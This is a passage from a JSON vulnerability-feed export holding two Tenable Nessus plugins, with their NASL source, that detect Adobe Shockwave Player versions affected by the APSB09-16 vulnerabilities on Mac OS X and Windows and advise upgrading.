therefore, affected by multiple\nvulnerabilities :\n\n - An invalid index vulnerability allows code execution.\n (CVE-2009-3463)\n\n - Invalid pointer vulnerabilities that allow code\n execution. (CVE-2009-3464, CVE-2009-3465)\n\n - An invalid string length vulnerability allows code\n execution. (CVE-2009-3466)\n\n - A boundary condition issue allows a denial of service.\n (CVE-2009-3244)", "edition": 28, "published": "2014-12-22T00:00:00", "title": "Adobe Shockwave Player <= 11.5.1.601 Multiple Vulnerabilities (APSB09-16) (Mac OS X)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3466", "CVE-2009-3464", "CVE-2009-3463", "CVE-2009-3244", "CVE-2009-3465"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:adobe:shockwave_player"], "id": "MACOSX_SHOCKWAVE_PLAYER_APSB09_16.NASL", "href": "https://www.tenable.com/plugins/nessus/80170", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80170);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2009-3244\",\n \"CVE-2009-3463\",\n \"CVE-2009-3464\",\n \"CVE-2009-3465\",\n \"CVE-2009-3466\"\n );\n script_bugtraq_id(36905);\n\n script_name(english:\"Adobe Shockwave Player <= 11.5.1.601 Multiple Vulnerabilities (APSB09-16) (Mac OS X)\");\n script_summary(english:\"Checks the version of Shockwave Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser plugin that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X host contains a version of Adobe Shockwave Player\nthat is 11.5.1.601 or earlier. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An invalid index vulnerability allows code execution.\n (CVE-2009-3463)\n\n - Invalid pointer vulnerabilities that allow code\n execution. (CVE-2009-3464, CVE-2009-3465)\n\n - An invalid string length vulnerability allows code\n execution. (CVE-2009-3466)\n\n - A boundary condition issue allows a denial of service.\n (CVE-2009-3244)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb09-16.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Shockwave version 11.5.2.602 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2009-3466\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(94, 119, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:shockwave_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"shockwave_player_detect_macosx.nbin\");\n script_require_keys(\"installed_sw/Shockwave Player\", \"Host/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\napp = 'Shockwave Player';\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\n\nver = install['version'];\npath = install['path'];\n\nif (ver_compare(ver:ver, fix:'11.5.1.601', strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed versions : 11.5.2.602' +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(port:0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app, ver, path);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T06:03:08", "description": "The remote Windows host contains a version of Adobe's Shockwave Player\nthat is 11.5.1.601 or earlier. As such, it is affected by multiple\nissues :\n\n - An invalid index vulnerability could lead to code\n execution. (CVE-2009-3463)\n\n - Invalid pointer vulnerabilities could lead to code\n execution. (CVE-2009-3464, CVE-2009-3465)\n\n - An invalid string length vulnerability could potentially\n lead to code execution. (CVE-2009-3466)\n\n - A boundary condition issue could lead to a denial\n of service. (CVE-2009-3244)", "edition": 28, "published": "2009-11-04T00:00:00", "title": "Shockwave Player <= 11.5.1.601 Multiple Vulnerabilities (APSB09-16)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3466", "CVE-2009-3464", "CVE-2009-3463", "CVE-2009-3244", "CVE-2009-3465"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:adobe:shockwave_player"], "id": "SHOCKWAVE_PLAYER_APSB09_16.NASL", "href": "https://www.tenable.com/plugins/nessus/42369", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(42369);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/07/27 18:38:15\");\n\n script_cve_id(\"CVE-2009-3244\", \"CVE-2009-3463\", \"CVE-2009-3464\", \"CVE-2009-3465\", \"CVE-2009-3466\");\n script_bugtraq_id(36905);\n\n script_name(english:\"Shockwave Player <= 11.5.1.601 Multiple Vulnerabilities (APSB09-16)\");\n script_summary(english:\"Checks version of Shockwave Player\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser plugin that is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host contains a version of Adobe's Shockwave Player\nthat is 11.5.1.601 or earlier. As such, it is affected by multiple\nissues :\n\n - An invalid index vulnerability could lead to code\n execution. (CVE-2009-3463)\n\n - Invalid pointer vulnerabilities could lead to code\n execution. (CVE-2009-3464, CVE-2009-3465)\n\n - An invalid string length vulnerability could potentially\n lead to code execution. (CVE-2009-3466)\n\n - A boundary condition issue could lead to a denial\n of service. (CVE-2009-3244)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb09-16.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Shockwave version 11.5.2.602 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(94, 119, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:shockwave_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139,445);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"audit.inc\");\n\n# Connect to the appropriate share.\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0, \"The 'SMB/Registry/Enumerated' KB item is missing.\");\nname = kb_smb_name();\nport = kb_smb_transport();\n\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\n\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:\"IPC$\");\nif (rc != 1)\n{\n NetUseDel();\n exit(1, \"Can't connect to IPC$ share.\");\n}\n\n#Connect to remote registry\nhklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);\nif (isnull(hklm))\n{\n NetUseDel();\n exit(1, \"Can't connect to the remote registry.\");\n}\n\n#Check whether it's installed\nvariants = make_array();\n\n# - check for the browser plugin\nkey = \"SOFTWARE\\MozillaPlugins\\@adobe.com/ShockwavePlayer\";\nkey_h = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);\nif (!isnull(key_h))\n{\n item = RegQueryValue(handle:key_h, item:\"Path\");\n if (!isnull(item))\n {\n file = item[1];\n variants[file] = \"Plugin\";\n }\n RegCloseKey(handle:key_h);\n}\nkey = \"SOFTWARE\\Mozilla\";\nkey_h = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);\nif (!isnull(key_h))\n{\n info = RegQueryInfoKey(handle:key_h);\n for (i=0; i<info[1]; ++i)\n {\n subkey = RegEnumKey(handle:key_h, index:i);\n if (strlen(subkey) && subkey =~ \"^Mozilla Firefox \")\n {\n key2 = key + \"\\\" + subkey + \"\\Extensions\";\n key2_h = RegOpenKey(handle:hklm, key:key2, mode:MAXIMUM_ALLOWED);\n if (!isnull(key2_h))\n {\n item = RegQueryValue(handle:key2_h, item:\"Plugins\");\n if (!isnull(item))\n {\n file = item[1] + \"\\np32dsw.dll\";\n variants[file] = \"Plugin\";\n }\n RegCloseKey(handle:key2_h);\n }\n }\n }\n RegCloseKey(handle:key_h);\n}\n\nopera_path = get_kb_item(\"SMB/Opera/Path\");\nif (!isnull(opera_path))\n{\n # nb: we'll check later whether this actually exists.\n file = opera_path + \"Program\\Plugins\\np32dsw.dll\";\n variants[file] = \"Plugin\";\n}\n\n#Check for the ActiveX control\nclsids = make_list(\n '{4DB2E429-B905-479A-9EFF-F7CBD9FD52DE}',\n '{233C1507-6A77-46A4-9443-F871F945D258}',\n '{166B1BCA-3F9C-11CF-8075-444553540000}' #used in versions <= 10.x\n);\nforeach clsid (clsids)\n{\n key = \"SOFTWARE\\Classes\\CLSID\\\" + clsid + \"\\InprocServer32\";\n key_h = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);\n if (!isnull(key_h))\n {\n item = RegQueryValue(handle:key_h, item:NULL);\n if (!isnull(item))\n {\n file = item[1];\n variants[file] = \"ActiveX\";\n }\n RegCloseKey(handle:key_h);\n }\n}\nRegCloseKey(handle:hklm);\nif (max_index(keys(variants)) == 0)\n{\n NetUseDel();\n exit(0, \"Shockwave Player is not installed.\");\n}\n\n#Determine the version of each instance found.\nfiles = make_array();\ninfo = \"\";\n\nforeach file (keys(variants))\n{\n #Don't report again if the name differs only in its case.\n if (files[tolower(file)]++) continue;\n\n variant = variants[file];\n\n share = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:file);\n file2 = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\", string:file);\n NetUseDel(close:FALSE);\n\n rc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\n if (rc != 1)\n {\n NetUseDel();\n exit(1, \"Can't connect to \"+share+\" share.\");\n }\n\n fh = CreateFile(\n file:file2,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n );\n if (!isnull(fh))\n {\n ver = GetFileVersion(handle:fh);\n CloseFile(handle:fh);\n\n if (\n isnull(ver) ||\n (ver[0] == 0 && ver[1] == 0 && ver[2] == 0 && ver[3] == 0)\n )\n {\n NetUseDel();\n exit(1, \"Failed to get the file version from '\"+file+\"'.\");\n }\n\n if (\n ver[0] < 11 ||\n (\n ver[0] == 11 &&\n (\n ver[1] < 5 ||\n (\n ver[1] == 5 &&\n (\n ver[2] < 1 ||\n (ver[2] == 1 && ver[3] <= 601)\n )\n )\n )\n )\n )\n {\n version = string(ver[0], \".\", ver[1], \".\", ver[2], \".\", ver[3]);\n\n if (variant == \"Plugin\")\n {\n info += ' - Browser Plugin (for Firefox / Netscape / Opera) :\\n';\n }\n else if (variant == \"ActiveX\")\n {\n info += ' - ActiveX control (for Internet Explorer) :\\n';\n }\n info += ' ' + file + ', ' + version + '\\n';\n }\n }\n NetUseDel(close:FALSE);\n}\nNetUseDel();\n\nif (!info) exit(0, \"No vulnerable installs of Shockwave Player were found.\");\n\nif (report_verbosity > 0)\n{\n if (max_index(split(info)) > 2) s = \"s\";\n else s = \"\";\n\n report = string(\n \"\\n\",\n \"Nessus has identified the following vulnerable instance\", s, \" of Shockwave\\n\",\n \"Player installed on the remote host :\\n\",\n \"\\n\",\n info\n );\n security_hole(port:port, extra:report);\n}\nelse security_hole(port:port);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}